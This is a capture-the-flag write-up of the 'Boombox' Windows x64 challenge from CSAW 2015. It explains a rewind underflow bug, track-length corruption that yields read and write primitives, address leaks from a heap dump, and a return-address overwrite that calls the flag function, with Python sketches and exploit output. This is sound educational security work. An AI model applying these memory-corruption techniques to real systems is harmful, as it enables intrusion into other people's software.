Boombox is a Windows 8.1 x64 pwning challenge created by Markus Gaasedelen for the CSAW 2015 finals. Sadly, we put this challenge off for too long during the CTF and ran out of time to solve it.

However, he offered it up as a challenge to people on RPISEC, so I decided to try it again.

Boombox is run with AppJailLauncher and implements a system for storing "songs" on different tracks of different "mixtapes". There are many actions you can perform on these tapes, such as rewind, play, record, seek, and fast forward. Through reverse engineering these functions, I put together what the underlying structures look like:

struct boombox_state {
    uint32_t selected_track_index;
    uint32_t selected_mixtape;
    uint64_t position_in_track;
    mixtape * mixtape_list[10];
};

struct mixtape {
    boombox_state * global_state;
    char mixtape_name[0x20];
    uint64_t number_of_tracks;
    track * track_list[10];
};

struct track {
    char track_name[0x20];
    uint64_t track_length;
    char track_data[0x200];
};
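
As a quick sanity check on these layouts, the track and mixtape structs can be mirrored with Python's ctypes to read off the field offsets. This is only a sketch: it assumes natural x64 alignment with no extra padding, and it models pointers as plain 64-bit integers so the result does not depend on the machine running the script.

```python
import ctypes

class Track(ctypes.Structure):
    # Mirrors the reversed `track` struct.
    _fields_ = [
        ("track_name", ctypes.c_char * 0x20),
        ("track_length", ctypes.c_uint64),
        ("track_data", ctypes.c_char * 0x200),
    ]

class Mixtape(ctypes.Structure):
    # Mirrors the reversed `mixtape` struct; pointers are modeled as
    # 64-bit integers (an assumption made for portability of this sketch).
    _fields_ = [
        ("global_state", ctypes.c_uint64),
        ("mixtape_name", ctypes.c_char * 0x20),
        ("number_of_tracks", ctypes.c_uint64),
        ("track_list", ctypes.c_uint64 * 10),
    ]

print(hex(Track.track_length.offset))      # 0x20
print(hex(Track.track_data.offset))        # 0x28
print(hex(ctypes.sizeof(Track)))           # 0x228
print(hex(Mixtape.mixtape_name.offset))    # 0x8
print(hex(Mixtape.track_list.offset))      # 0x30
```

The detail that matters most is that track_length ends exactly where track_data begins, so anything written just before the data buffer lands in the high bytes of the little-endian length field.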

It is important to note that the global boombox_state struct is located inside the stack frame of the main function. There is also an option to create mixtapes, which mallocs a mixtape struct and up to 10 track structs to go with it. You can then enter raw bytes to be stored in the tracks.

The vulnerability in this program lies in the rewind function. It lets you "rewind" for a period of time and then attempts to subtract four times the number of seconds waited from the track position. However, the underflow check and the actual subtraction apply the multiplication and division in a different order:

timeDiff = GetTickCount() - oldTime;
// The check divides first, then multiplies.
underflowCheckVar = 4 * (timeDiff / 1000);
if ( underflowCheckVar ) {
    if ( ((state_->position - underflowCheckVar) & 0x80000000) == 0 ) {
        // The subtraction multiplies first, then divides.
        state_->position -= 4 * timeDiff / 1000;
        formatted_print("Rewind stopped!\n", 5);
    } else {
        state_->position = 0;
        formatted_print("Reached start of track\n", 5);
    }
}

If you rewind for 1.9 seconds (timeDiff = 1900), the checked value 4 * (timeDiff / 1000) evaluates to 4, while the value actually subtracted, 4 * timeDiff / 1000, evaluates to 7. Starting from a track position of 4, the check passes and the position ends up at -3, so we can underflow the track position by 3. This means we can write 3 bytes before the data buffer in the track struct, smashing the 3 most significant bytes of track_length. By seeking to some offset within that enlarged track, we can perform track operations at somewhat arbitrary offsets.
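
The mismatch is easy to reproduce outside the binary. The following is a minimal Python model of the rewind logic, not the decompiled code itself: the function name `rewind` and the use of a signed Python integer for the position are assumptions made for illustration.

```python
def rewind(position, time_diff_ms):
    """Model of the rewind logic; returns the new track position."""
    check = 4 * (time_diff_ms // 1000)        # divide first, then multiply
    if check == 0:
        return position                        # less than one second: no change
    if ((position - check) & 0x80000000) == 0:
        # Multiply first, then divide: can be up to 3 larger than `check`.
        return position - 4 * time_diff_ms // 1000
    return 0                                   # "Reached start of track"

print(rewind(4, 1900))   # -3: the check saw 4, the subtraction used 7
print(rewind(4, 1000))   # 0: both expressions agree on whole seconds
print(rewind(3, 1900))   # 0: the check catches this case

# Rewind durations (in ms, under two seconds) that give the full 3-byte underflow.
window = [t for t in range(1000, 2000) if rewind(4, t) == -3]
print(window[0], window[-1])   # 1750 1999
```

In this model, any rewind between 1.75 and 2 seconds from position 4 gives the full underflow, which leaves a comfortable timing margin over a network connection.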

Read / Write Primitives
Although the corrupted length is very large, it is not large enough to reach small negative offsets, which prevents us from getting a full arbitrary write. We also want an arbitrary read, since ASLR is enabled and we do not know where anything is. We can attempt to leak data using the "play" function, which encodes the track data as sound effects and prints it to the screen. However, it attempts to encode the entire track, so with the huge track length we have, it hits invalid memory and crashes.

To fix both problems, we can use the corrupted size of one track to directly overwrite the size of a second track. Setting the second track's size to int_max gives us an arbitrary write, even to small negative offsets, and setting it to the offset we want to read plus the length of the data prevents the runaway read in the play function.
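
The two-track trick can be illustrated with a toy model of the heap. Everything here is hypothetical: the `record` and `play` helpers only approximate the behaviour described above, the track positions and the `SECRET` marker are made up, and the three bytes written over the length are arbitrary. The sketch shows the offset arithmetic only.

```python
import struct

LEN_OFF, DATA_OFF = 0x20, 0x28        # field offsets inside a track struct

heap = bytearray(0x1000)              # toy stand-in for the process heap
TRACK_A, TRACK_B = 0x100, 0x400       # hypothetical locations of two tracks
SECRET_AT = 0x800                     # hypothetical data we want to leak
heap[SECRET_AT:SECRET_AT + 6] = b"SECRET"
for t in (TRACK_A, TRACK_B):
    struct.pack_into("<Q", heap, t + LEN_OFF, 0x200)

def get_len(track):
    return struct.unpack_from("<Q", heap, track + LEN_OFF)[0]

def record(track, pos, data):
    """Write data at track_data + pos if it fits inside track_length."""
    if pos + len(data) > get_len(track):
        raise ValueError("past end of track")
    start = track + DATA_OFF + pos
    heap[start:start + len(data)] = data

def play(track, pos):
    """Return everything from pos up to track_length (the whole rest of the track)."""
    base = track + DATA_OFF
    return bytes(heap[base + pos:base + get_len(track)])

# 1. The rewind underflow leaves the position at -3, so a 3-byte write
#    lands on the top three bytes of track A's length.
record(TRACK_A, -3, b"\x00\x00\x01")

# 2. With A's length now huge, seek from A to B's length field and set it
#    to (offset we want to read) + (number of bytes we want).
want = SECRET_AT - (TRACK_B + DATA_OFF)
b_len_pos = (TRACK_B + LEN_OFF) - (TRACK_A + DATA_OFF)
record(TRACK_A, b_len_pos, struct.pack("<Q", want + 6))

# 3. Playing B from that offset now stops after exactly 6 bytes.
leaked = play(TRACK_B, want)
print(leaked)   # b'SECRET'
```

Using track B as the working track keeps track A's corrupted length untouched, so B's length can be rewritten as often as needed for each new read or write.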

With these two primitives, it is time to look for things that we can leak and modify to get our flag. Our goal is clear: we want to call the function at offset 0x3820, which opens the flag file and prints it to the console. The easiest way to do this is to overwrite a return address on the stack. However, we do not know where the text section or the stack will be when the program runs. We also don't know the location of the heap to calculate our offsets from. Luckily, the mixtape struct contains the golden ticket. It has both pointers to the heap (via the track pointers) and a pointer to the boombox_state struct on the stack. By using the stack address, we can then read the return address and get the text segment location.
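
Turning a leaked return address into the address of the flag function is simple arithmetic. The sketch below makes two assumptions that the write-up does not confirm: that 0x3820 is relative to the image base, and that the return site sits at offset 0x40ef in the image (chosen here only because Windows loads images on 64 KiB boundaries and the sample leak from the exploit output ends in 0x40ef). The helper name `win_address` is hypothetical.

```python
WIN_OFFSET = 0x3820   # offset of the flag-printing function, from the write-up

def win_address(leaked_ret, ret_site_offset):
    """Compute the flag function's address from a leaked return address."""
    image_base = leaked_ret - ret_site_offset
    if image_base & 0xFFFF:
        # Windows image bases are 64 KiB aligned; anything else means the
        # assumed return-site offset is wrong.
        raise ValueError("unexpected image base: %#x" % image_base)
    return image_base + WIN_OFFSET

# Sample text leak taken from the exploit output; 0x40ef is an assumed offset.
print(hex(win_address(0x00007FF7221F40EF, 0x40EF)))   # 0x7ff7221f3820
```

The alignment check is a cheap way to catch a wrong offset before writing anything to the stack.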

However, the difficulty is in finding the offset from the track structs to the mixtape struct. Every time AppJailLauncher is run, the offset is different, although it stays constant between subsequent runs under the same AppJailLauncher instance. The offset also varied by about 0x5000, so I decided to dump a large section of the remote heap on the same AppJailLauncher instance and look for the mixtape name I had set. It was a somewhat slow process since the remote server kept disconnecting at random, but eventually the offset was found. It ended up being -0x5478 bytes from our track on the remote instance I ran against.

051b8: 0000000000000000 0000000000000000 0000000000000000 0000000000000000
051d8: 0000000000000000 0000000000000000 0000000000420000 0000000000000000
051f8: 0000000000000000 0000000000000000 0000000000000000 0000000000000000
05218: 0000000000000000 0000000000000000 0000000000000000 0000000000000000
052d8: 0000000000000000 0000000000000000 0000000000000000 0000000000000000
052f8: 0000000000000000 0000000000000000 0000000000210000 0000000000000000
05318: 0000002000000000 0000000000000000 0000000000000000 0000000000000000
05338: 0000000000000042 0000000000000000 0000000000000000 0000004000000000
05358: 0000000000000000 0000000000000000 0000002100420000 0000000000000000
05378: 0000000000000000 0000000000000000 0000000000000000 0000000000000000
05398: 0000000000410000 0000000000000000 0063000000200000 0000000000000021
053b8: 0021002100000081 0000000000200020 000000a500210020 0000000000210000
053d8: 0000000000000000 0100821da8372ec6 0002000100210000 0041020901ac0084
053f8: 3d524559414c5f54 4365746176656c45 6f72506574616572 0000000073736563
05418: 77006674635c7372 3a433d7269646e69 73776f646e69575c 41504d4f435f5f00
05438: 4d414e5245535500 5355006674633d45 4c49464f52505245 6573555c3a433d45
05458: 0000000000000000 0000000000000002 000000fb0b2eb1a0 000000fb0b2eb3d0
05478: 000000fb0b27fa90 0000000074736574 0000000000000000 0000000000000000 "test"=74736574 Our mixtape name
05498: 000000fb0b2e5a90 00007ffc62521ccc 6f626d6f6f625c73 200082152a3f2e4c
054b8: 6d65545c43415c65 08008257223f2e44 00007ffc625a8870 0000000100000001
054d8: 4c5c617461447070 6361505c6c61636f 6f625c736567616b 78652e786f626d6f
054f8: 6e69575c3a433d74 80001c00263d71d6 6573555c3a433d50 415c6674635c7372
05518: 0031237063542d50 80001b65263b71c8 53003a433d657669 6f6f526d65747379
05538: 6573555c3a433d43 80001a75263971ca 4f49535345530063 44523d454d414e4e
05558: 537265776f507377 8000195c263771cc 656c75646f4d5c30 494c425550005c73
05578: 433d68746150656c 8000186e263571ce 6d65747379735c73 6f646e69575c3233
05598: 206d6172676f7250 8000177341016a29 2450243d54504d4f 75646f4d53500047
055b8: 656c6946206d6172 8000163841036a2b 576d6172676f7250 5c3a433d32333436
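
Searching a dump like the one above for the mixtape name can be automated. The sketch below assumes the dump has been reassembled into a bytes object in ascending address order and that the unused part of the 0x20-byte name buffer is zero, as it is in the dump; `find_mixtape` and `parse_mixtape` are hypothetical helper names. The sample values are taken from the rows at 05478 and 05458.

```python
import struct

NAME_LEN = 0x20   # size of mixtape_name

def find_mixtape(dump, name):
    """Return the offset of the mixtape struct in dump, or -1 if not found."""
    idx = dump.find(name.ljust(NAME_LEN, b"\x00"))
    if idx < 8:
        return -1
    return idx - 8            # global_state pointer precedes the name

def parse_mixtape(dump, off):
    """Extract the stack pointer and track pointers from a mixtape struct."""
    (global_state,) = struct.unpack_from("<Q", dump, off)
    (count,) = struct.unpack_from("<Q", dump, off + 0x28)
    count = min(count, 10)    # track_list holds at most 10 entries
    tracks = struct.unpack_from("<%dQ" % count, dump, off + 0x30)
    return global_state, list(tracks)

# Rebuild the interesting part of the dump behind some filler bytes.
sample = (b"\xAA" * 0x40
          + struct.pack("<Q", 0xFB0B27FA90)
          + b"test".ljust(NAME_LEN, b"\x00")
          + struct.pack("<QQQ", 2, 0xFB0B2EB1A0, 0xFB0B2EB3D0))

off = find_mixtape(sample, b"test")
stack_ptr, track_ptrs = parse_mixtape(sample, off)
print(hex(off), hex(stack_ptr), [hex(p) for p in track_ptrs])
```

Matching on the zero-padded name rather than the bare string reduces false positives from the environment strings that surround the struct in the dump.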

With this offset, it was a simple matter of using our read primitive to read the heap, stack, and text addresses. Finally, we use our write primitive to change the return address to our win function. However, overwriting the return address of main directly seemed to make the win function crash, so I ended up overwriting that address with a NOP ROP gadget (actually a return into the print menu, for visual confirmation that the exploit was working) and placing the win function's address in the next slot.
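
The final write is just two little-endian 64-bit values placed over the saved return address. This is a sketch under stated assumptions: `build_overwrite` is a hypothetical helper, the image base is inferred from the sample text leak, and the gadget offset 0x1234 is a placeholder, since the write-up does not give the real one.

```python
import struct

def build_overwrite(image_base, gadget_offset, win_offset=0x3820):
    """Pack the two return-address slots: the gadget first, then the win function."""
    return struct.pack("<QQ",
                       image_base + gadget_offset,   # slot 1: harmless return
                       image_base + win_offset)      # slot 2: flag function

# 0x7ff7221f0000 is an assumed image base; 0x1234 is a placeholder offset.
payload = build_overwrite(0x7FF7221F0000, 0x1234)
print(payload.hex())
```

The resulting 16 bytes would be written with the write primitive at the stack address of main's saved return address.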

$ python remote
Setting up...Done
Stack Leak: 0x000000a89565fd20
Heap Leak: 0x000000a89573b3d0
Text Leak: 0x00007ff7221f40ef
| +----------------------+
| | 1. upload mixtape    |
| | 2. eject mixtape     |
| | 3. select mixtape    |
| | 4. play              |
| | 5. fast forward      |
| | 6. rewind            |
| | 7. next track        |
| | 8. previous track    |
| | 9. record            |
| | 10. seek             |
| | 11. print menu       |
| | 12. exit             |
| +----------------------+

The final code can be found here.